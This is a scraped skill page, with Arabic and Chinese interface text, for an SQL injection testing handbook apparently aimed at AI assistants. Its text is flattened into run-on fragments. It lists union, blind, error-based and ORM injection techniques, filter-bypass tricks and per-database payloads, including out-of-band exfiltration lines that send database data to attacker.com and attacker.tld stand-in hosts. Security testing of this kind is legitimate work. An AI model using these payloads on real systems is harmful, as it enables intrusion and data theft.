بنقرة واحدة
strix-sql
Strix SQL 注入测试手册,覆盖 union、blind、error-based 与 ORM 绕过技巧;触发名:strix-sql-injection
التثبيت باستخدام Codex أو Claude انسخ هذا Prompt والصقه في Codex أو Claude أو مساعد آخر ليراجع صفحة Skill ويثبّتها لك.
القائمة
Strix SQL 注入测试手册,覆盖 union、blind、error-based 与 ORM 绕过技巧;触发名:strix-sql-injection
التثبيت باستخدام Codex أو Claude انسخ هذا Prompt والصقه في Codex أو Claude أو مساعد آخر ليراجع صفحة Skill ويثبّتها لك.
استنادا إلى تصنيف SOC المهني
面向中文用户和新手的统一入口,保持原有两种模式:1) 自动分流,2) 先头脑风暴再分流。分流目标既可以是 ctf-*,也可以在 Web/接口/漏洞验证阶段增强到 strix-*;适合不知道该用哪个 skill、想先理清题意、又不想自己先判断何时该切到工具链或漏洞专项的场景;触发名:ctf-beginner-hub
面向 CTF 新手与综合题的统一总控 skill。保持原有两种主模式:1) 自动分流,2) 先头脑风暴再分流。分流目标既可以是 ctf-*,也可以在 Web/接口/漏洞验证阶段增强到 strix-*;适合不知道该用哪个 skill、想边做边学、又不想自己先判断何时切换到工具链或漏洞专项的场景;触发名:ctf-super-hub
Strix JWT 与 OIDC 安全测试手册,覆盖令牌伪造、算法混淆与声明篡改;触发名:strix-authentication-jwt
给中文用户和新手用的 Strix Lite 统一入口:先判断该用哪一个 strix-* 工具或漏洞测试 skill,再给最小化起手步骤;适合在 Web 安全测试、工具链使用、漏洞验证时不知道先用哪个 Strix skill 的场景;触发名:strix-beginner-hub
Strix 功能级授权缺陷测试手册,覆盖操作级权限失效、管理功能越权与 API 操作绕过;触发名:strix-broken-function-level-authorization
Strix 业务逻辑漏洞测试手册,覆盖流程绕过、状态操控与领域约束破坏;触发名:strix-business-logic
| name | Strix•SQL 注入 |
| description | Strix SQL 注入测试手册,覆盖 union、blind、error-based 与 ORM 绕过技巧;触发名:strix-sql-injection |
SQLi remains one of the most durable and impactful vulnerability classes. Modern exploitation focuses on parser differentials, ORM/query-builder edges, JSON/XML/CTE/JSONB surfaces, out-of-band exfiltration, and subtle blind channels. Treat every string concatenation into SQL as suspect.
Databases
Integration Paths
Input Locations
whereRaw/orderByRaw, string templates in ORMsError-Based
Boolean-Based
Time-Based
SLEEP/pg_sleep/WAITFOROut-of-Band (OAST)
@@version, database(), user(), current_user()extractvalue()/updatexml() (older), JSON functions for error shapingLOAD_FILE(), SELECT ... INTO DUMPFILE/OUTFILE (requires FILE privilege, secure_file_priv)LOAD_FILE(CONCAT('\\\\',database(),'.attacker.com\\a'))SLEEP(n), BENCHMARKJSON_EXTRACT/JSON_SEARCH with crafted paths; GIS funcs sometimes leakversion(), current_user, current_database()xpath() errors in xml2COPY (program ...) or dblink/foreign data wrappers (when enabled); http extensionspg_sleep(n)COPY table TO/FROM '/path' (requires superuser), lo_import/lo_export->, ->>, @>, ?| with lateral/CTE for blind extraction@@version, db_name(), system_user, user_name()xp_dirtree, xp_fileexist; HTTP via OLE automation (sp_OACreate) if enabledxp_cmdshell (often disabled), OPENROWSET/OPENDATASOURCEWAITFOR DELAY '0:0:5'; heavy functions cause measurable delaysFOR XML PATH leaksv$version, ora_database_name, userUTL_HTTP/DBMS_LDAP/UTL_INADDR/HTTPURITYPE (permissions dependent)dbms_lock.sleep(n)to_number/to_date conversions, XMLTypeUTL_FILE with directory objects (privileged)ORDER BY n and UNION SELECT null,...CAST/CONVERT; coerce to text/json for renderingSUBSTRING/ASCII, LEFT/RIGHT, or JSON/array operatorsAND (SELECT CASE WHEN (predicate) THEN pg_sleep(0.5) ELSE 0 END)xp_dirtree \\\\<data>.attacker.tld\\aUTL_HTTP.REQUEST('http://<data>.attacker')LOAD_FILE with UNC pathINTO OUTFILE/DUMPFILE, COPY TO, xp_cmdshell redirectionwhereRaw/orderByRaw, string interpolation into LIKE/IN/ORDER clauses@> in PostgreSQL) with raw fragmentsIN (...))CASE WHEN for boolean channelsMATCH AGAINST, to_tsvector/to_tsquery with payload mixingWhitespace/Spacing
/**/, /**/!00000, comments, newlines, tabs0xe3 0x80 0x80 (ideographic space)Keyword Splitting
UN/**/ION, U%4eION, backticks/quotes, case foldingNumeric Tricks
0x61646d696e)Encodings
char()/CONCAT_ws to build tokensClause Relocation
WITH), lateral joins to hide payload shapewhereRaw/orderByRawModern SQLi succeeds where authorization and query construction drift from assumptions. Bind parameters everywhere, avoid dynamic identifiers, and validate at the exact boundary where user input meets SQL.